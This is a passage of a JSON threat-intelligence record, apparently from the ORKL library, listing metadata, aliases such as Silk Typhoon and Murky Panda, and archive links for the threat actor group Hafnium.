"529c1ae9-4579-4245-86a6-20f4563a695d", "created_at": "2022-10-25T16:07:23.702006Z", "updated_at": "2026-04-10T02:00:04.71708Z", "deleted_at": null, "main_name": "Hafnium", "aliases": [ "G0125", "Murky Panda", "Red Dev 13", "Silk Typhoon" ], "source_name": "ETDA:Hafnium", "tools": [], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434949, "ts_updated_at": 1775826718, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e6ba34bbe78d34c34d977f69154df54c16da9590.pdf", "text": "https://archive.orkl.eu/e6ba34bbe78d34c34d977f69154df54c16da9590.txt", "img": "https://archive.orkl.eu/e6ba34bbe78d34c34d977f69154df54c16da9590.jpg" } }